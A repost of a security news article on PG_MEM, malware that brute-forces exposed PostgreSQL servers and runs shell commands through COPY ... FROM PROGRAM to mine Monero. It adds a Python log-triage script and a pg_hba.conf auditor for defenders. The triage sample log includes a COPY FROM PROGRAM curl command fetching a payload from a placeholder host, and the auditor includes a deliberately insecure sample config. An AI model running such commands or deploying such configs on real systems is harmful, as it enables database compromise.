New Malware PG_MEM Targets PostgreSQL DBs for Crypto Mining

SeniorTechInfo

Unpacking PG_MEM: A New Malware Strain Targeting PostgreSQL Databases

Aug 22, 2024 | Ravie Lakshmanan | Database Security / Cryptocurrency

Cybersecurity researchers have unpacked a new malware strain called PG_MEM that mines cryptocurrency after brute-forcing its way into internet-exposed PostgreSQL database instances.

According to Aqua security researcher Assaf Morag, PG_MEM gets in by brute-forcing PostgreSQL logins, guessing credentials until one works, which only succeeds against weak passwords. Once authenticated as a sufficiently privileged role, the attacker uses the COPY … FROM PROGRAM SQL command, which makes the server run a shell command on the database host under the PostgreSQL service account, to carry out further malicious activity such as data theft and malware deployment.

The attack chain Aqua identified targets misconfigured, internet-facing PostgreSQL databases: after the brute force succeeds, the attacker creates an administrator (superuser) role and abuses the PROGRAM option to execute shell commands. Successful attacks are followed by reconnaissance and by commands that strip superuser permissions.

The malware then downloads two payloads, PG_MEM and PG_CORE, from a remote server; they terminate competing processes, establish persistence, and start mining Monero. Throughout, the COPY command's PROGRAM option is the primitive used to run commands and control the server.
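What the chain above looks like in a PostgreSQL server log, and how to triage it, as an added example that is not code from the article or from Aqua's report. It assumes the server was configured with log_line_prefix = '%m [%p] %u@%d %h ' and log_statement = 'all' (or at least 'mod', which covers COPY FROM); failed password logins are logged at FATAL by default, but the statement lines only exist if statement logging was on before the intrusion. The log lines are constructed samples using TEST-NET addresses, and the role name and URL in them are placeholders.

```python
"""Triage a PostgreSQL server log for the PG_MEM-style chain: a burst of failed
password logins from one client, then, on a session from the same client,
superuser role changes and COPY ... FROM/TO PROGRAM shell execution.

Added example, not from the article.  Assumed (not from the article):
log_line_prefix = '%m [%p] %u@%d %h ' and log_statement = 'all' or 'mod'.
SAMPLE_LOG is a constructed sample; addresses are TEST-NET / RFC 1918.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+) \S+ "  # %m: timestamp with ms + zone
    r"\[(?P<pid>\d+)\] "                                  # %p: backend pid
    r"(?P<user>[^@\s]+)@(?P<db>\S+) "                     # %u@%d: role and database
    r"(?P<host>\S+) "                                     # %h: client address
    r"(?P<level>[A-Z]+):\s+(?P<msg>.*)$"
)
AUTH_FAIL_RE = re.compile(r"password authentication failed for user")
# COPY ... FROM PROGRAM 'cmd' (or TO PROGRAM): the server runs 'cmd' on the database
# host as its own OS user.  Requires superuser or membership in pg_execute_server_program.
PROGRAM_RE = re.compile(r"\bCOPY\b.*?\b(?:FROM|TO)\s+PROGRAM\s+'(?P<cmd>[^']*)'", re.I)
# Creating a superuser role, or stripping SUPERUSER from one, as the article describes.
ROLE_RE = re.compile(r"\b(?:CREATE|ALTER)\s+(?:ROLE|USER)\b.*\b(?:NO)?SUPERUSER\b", re.I)

SAMPLE_LOG = """\
2024-08-22 10:00:01.100 UTC [4101] postgres@postgres 203.0.113.5 FATAL:  password authentication failed for user "postgres"
2024-08-22 10:00:01.400 UTC [4102] postgres@postgres 203.0.113.5 FATAL:  password authentication failed for user "postgres"
2024-08-22 10:00:01.700 UTC [4103] postgres@postgres 203.0.113.5 FATAL:  password authentication failed for user "postgres"
2024-08-22 10:00:02.000 UTC [4104] postgres@postgres 203.0.113.5 FATAL:  password authentication failed for user "postgres"
2024-08-22 10:00:02.300 UTC [4105] postgres@postgres 203.0.113.5 FATAL:  password authentication failed for user "postgres"
2024-08-22 10:00:02.600 UTC [4106] postgres@postgres 203.0.113.5 LOG:  connection authorized: user=postgres database=postgres
2024-08-22 10:00:03.000 UTC [4106] postgres@postgres 203.0.113.5 LOG:  statement: CREATE ROLE svc_backup LOGIN SUPERUSER PASSWORD 'x'
2024-08-22 10:00:03.500 UTC [4106] postgres@postgres 203.0.113.5 LOG:  statement: COPY tmp FROM PROGRAM 'id'
2024-08-22 10:00:04.000 UTC [4106] postgres@postgres 203.0.113.5 LOG:  statement: COPY tmp FROM PROGRAM 'curl -s http://198.51.100.7/payload -o /tmp/payload'
2024-08-22 10:00:05.000 UTC [4107] app@appdb 10.0.0.9 LOG:  statement: COPY orders FROM '/var/lib/postgresql/orders.csv' CSV
2024-08-22 10:00:06.000 UTC [4108] app@appdb 10.0.0.9 FATAL:  password authentication failed for user "app"
"""


def parse(lines):
    """Parse prefixed log lines into dicts; continuation/DETAIL lines are skipped."""
    events = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], "%Y-%m-%d %H:%M:%S.%f")
        events.append(e)
    return events


def brute_force_sources(events, threshold=5, window=timedelta(seconds=60)):
    """Return {client: total_failures} for clients with >= threshold failures in any window."""
    fails = defaultdict(list)
    for e in events:
        if e["level"] == "FATAL" and AUTH_FAIL_RE.search(e["msg"]):
            fails[e["host"]].append(e["ts"])
    flagged = {}
    for host, stamps in fails.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):          # sliding window over sorted timestamps
            while ts - stamps[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[host] = len(stamps)
                break
    return flagged


def program_copies(events):
    """Return (client, role, shell command) for every COPY ... FROM/TO PROGRAM statement."""
    out = []
    for e in events:
        if e["msg"].startswith("statement: "):
            m = PROGRAM_RE.search(e["msg"])
            if m:
                out.append((e["host"], e["user"], m.group("cmd")))
    return out


def superuser_role_changes(events):
    """Return (client, role, statement) for CREATE/ALTER ROLE touching SUPERUSER."""
    return [(e["host"], e["user"], e["msg"][len("statement: "):])
            for e in events
            if e["msg"].startswith("statement: ") and ROLE_RE.search(e["msg"])]


def triage(lines, threshold=5, window_seconds=60):
    events = parse(lines)
    hosts = brute_force_sources(events, threshold, timedelta(seconds=window_seconds))
    copies = program_copies(events)
    # Highest confidence: a client that brute-forced and then ran shell commands via COPY.
    confirmed = sorted({h for h, _, _ in copies if h in hosts})
    return {"brute_force": hosts, "program_copy": copies,
            "role_changes": superuser_role_changes(events), "confirmed_hosts": confirmed}


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_LOG.splitlines()), indent=2, default=str))
```

The legitimate `COPY orders FROM '/var/...' CSV` from the application host is deliberately in the sample: a file COPY is not a PROGRAM COPY, and a single failed login is not a brute force, so neither is flagged. In practice the regexes should be fed from `pg_stat_statements` or an audit extension as well, since an attacker who gains superuser can turn statement logging off.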

Morag notes that the campaign targets internet-facing PostgreSQL databases with weak passwords, which makes proper configuration and identity controls the decisive defence: keep PostgreSQL off the internet, restrict pg_hba.conf to known networks with scram-sha-256 authentication and strong unique passwords, and do not let application roles run as superuser, since COPY … FROM PROGRAM is only available to superusers and members of pg_execute_server_program.
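A minimal audit of pg_hba.conf for the exposure this campaign depends on, password (or no) authentication offered over TCP to any source address, with the weak configuration beside a hardened one. This is an added example, not code from the article or from Aqua; both configs are constructed samples and the severity labels are the example's own convention.

```python
"""Audit pg_hba.conf host rules for the exposure PG_MEM needs: password-based
or no authentication accepted over TCP from any source address.

Added example, not from the article.  WEAK_HBA and HARDENED_HBA are constructed
samples; severity labels are this example's own convention.
"""
import ipaddress

# trust: no authentication; password: cleartext; md5: legacy hash, superseded by scram-sha-256
WEAK_METHODS = {"trust", "password", "md5"}
OPEN_KEYWORDS = {"all"}                  # matches every client address
LOCAL_KEYWORDS = {"samehost", "samenet"}
HOST_TYPES = {"host", "hostssl", "hostnossl", "hostgssenc", "hostnogssenc"}

WEAK_HBA = """\
# constructed sample: internet-exposed server accepting password logins from anywhere
local   all   all                          peer
host    all   all   127.0.0.1/32           md5
host    all   all   0.0.0.0/0              md5
host    all   all   0.0.0.0     0.0.0.0    password
host    all   all   ::/0                   trust
"""

HARDENED_HBA = """\
# constructed sample: same server after hardening (first matching rule wins)
local   all   all                     peer
hostssl all   all   127.0.0.1/32      scram-sha-256
hostssl app   app   10.0.0.0/24       scram-sha-256
hostssl all   all   0.0.0.0/0         reject
hostssl all   all   ::/0              reject
"""


def parse_hba(text):
    """Return (type, db, user, addr, method) per rule; comments and blanks skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        f = line.split()
        if f[0] == "local" and len(f) >= 4:          # Unix-socket rule: no address field
            rules.append(("local", f[1], f[2], None, f[3]))
            continue
        if f[0] not in HOST_TYPES or len(f) < 5:
            continue
        addr, rest = f[3], f[4:]
        try:                                         # "address netmask method" form
            ipaddress.ip_address(rest[0])
            addr, rest = f"{addr}/{rest[0]}", rest[1:]
        except ValueError:
            pass                                     # CIDR, keyword or hostname form
        rules.append((f[0], f[1], f[2], addr, rest[0]))
    return rules


def reachable_from_anywhere(addr):
    """True if the address field matches every client (all, 0.0.0.0/0, ::/0, zero netmask)."""
    if addr in OPEN_KEYWORDS:
        return True
    if addr in LOCAL_KEYWORDS:
        return False
    try:
        return ipaddress.ip_network(addr, strict=False).prefixlen == 0
    except ValueError:
        return False                                 # hostname rule; resolving it is out of scope


def audit_hba(text):
    """Return [(severity, rule, why)] for rules that expose weak or no auth too widely."""
    findings = []
    for rule in parse_hba(text):
        kind, _db, _user, addr, method = rule
        if kind == "local" or method == "reject":
            continue
        anywhere = reachable_from_anywhere(addr)
        weak = method in WEAK_METHODS
        if anywhere and method == "trust":
            findings.append(("critical", rule, "no authentication from any address"))
        elif anywhere and weak:
            findings.append(("high", rule,
                             f"{method} logins from any address are brute-forceable; "
                             "use scram-sha-256 and a narrow CIDR"))
        elif anywhere:
            findings.append(("medium", rule, "open to every address; restrict the CIDR even with strong auth"))
        elif weak:
            findings.append(("low", rule, f"{method} on a restricted network; move to scram-sha-256"))
    return findings


if __name__ == "__main__":
    for sev, rule, why in audit_hba(WEAK_HBA):
        print(sev, rule, why)
    print("hardened findings:", audit_hba(HARDENED_HBA))
```

Rule order matters because pg_hba.conf is first-match: a permissive rule above the `reject` lines would still win, which is why the hardened sample lists the narrow rules first. The audit only covers the authentication path; `listen_addresses` in postgresql.conf and the set of superuser roles (query `pg_roles` for `rolsuper`) need checking alongside it.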
